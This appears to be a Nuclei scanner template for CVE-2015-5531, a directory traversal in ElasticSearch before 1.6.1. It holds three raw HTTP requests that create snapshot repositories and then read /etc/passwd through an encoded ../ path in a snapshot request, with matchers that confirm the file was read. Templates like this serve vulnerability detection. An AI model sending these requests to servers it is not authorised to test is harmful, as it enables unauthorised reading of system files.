id: CVE-2015-5531 info: name: ElasticSearch <1.6.1 - Local File Inclusion author: princechaddha severity: high description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html - https://www.elastic.co/community/security/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5531 cwe-id: CWE-22 tags: vulhub,packetstorm,cve,cve2015,elasticsearch metadata: max-request: 3 http: - raw: - | PUT /_snapshot/test HTTP/1.1 Host: {{Hostname}} { "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test" } } - | PUT /_snapshot/test2 HTTP/1.1 Host: {{Hostname}} { "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } } - | GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - 'ElasticsearchParseException' - 'Failed to derive xcontent from' - '114, 111, 111, 116, 58' condition: and - type: status status: - 400 # Enhanced by mp on 2022/06/08